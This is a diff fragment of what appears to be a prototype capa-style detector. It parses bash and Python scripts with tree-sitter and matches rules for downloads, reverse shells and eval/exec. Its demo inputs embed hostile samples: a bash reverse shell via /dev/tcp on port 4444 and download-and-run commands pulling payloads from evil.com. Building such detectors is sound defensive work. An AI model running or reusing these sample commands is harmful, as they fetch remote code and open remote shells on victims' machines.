+        try: yield Number(int(node.text.decode(), 0))
+        except ValueError: pass
+
+def python_char(node):
+    if node.type == "call":
+        func = node.child_by_field_name("function")
+        if func and func.text.decode() in ("eval", "exec"):
+            yield Characteristic("dynamic execution")
+
+HANDLERS = {
+    "bash": [bash_api, bash_string, bash_number, bash_char],
+    "python": [python_api, python_string, python_number, python_char],
+}
+
+# --- Feature extractor (mirrors StaticFeatureExtractor) ---
+
+def walk(node):
+    yield node
+    for c in node.children: yield from walk(c)
+
+def extract(source: bytes, lang: str) -> dict:
+    parser = Parser(Language({"bash": tsbash, "python": tspython}[lang].language()))
+    tree = parser.parse(source)
+    features = {}
+    for node in walk(tree.root_node):
+        addr = ScriptAddress.from_node(node)
+        for handler in HANDLERS[lang]:
+            for feat in handler(node):
+                features.setdefault(feat, set()).add(addr)
+    return features
+
+# --- Rule matching (simplified capa engine) ---
+
+def match_rules(features):
+    rules = [
+        ("download file via curl/wget", "or", [API("curl"), API("wget")]),
+        ("create reverse shell", "and", [API("bash"), Number(4444)]),
+        ("execute shell command (Python)", "or", [API("os.system"), API("subprocess.call")]),
+        ("dynamic code execution", "or", [Characteristic("dynamic execution")]),
+    ]
+    for name, logic, conditions in rules:
+        hits = [c in features for c in conditions]
+        if (logic == "and" and all(hits)) or (logic == "or" and any(hits)):
+            print(f"  ✅ {name}")
+
+# --- Run ---
+
+if __name__ == "__main__":
+    for lang, src in [
+        ("bash", b'#!/bin/bash\ncurl -o /tmp/payload "http://evil.com/mal"\nPORT=4444\nbash -i >& /dev/tcp/10.0.0.1/$PORT 0>&1'),
+        ("python", b'import os, subprocess\nos.system("wget http://evil.com/bd")\neval(open("/tmp/bd").read())'),
+    ]:
+        print(f"\n{'='*50}\n  {lang.upper()} script\n{'='*50}")
+        feats = extract(src, lang)
+        for feat, addrs in sorted(feats.items(), key=lambda x: min(a.line for a in x[1])):
+            print(f"  {min(addrs)} → {type(feat).__name__}({feat.value!r})")
+        print(f"\n  Rules matched:")
+        match_rules(feats)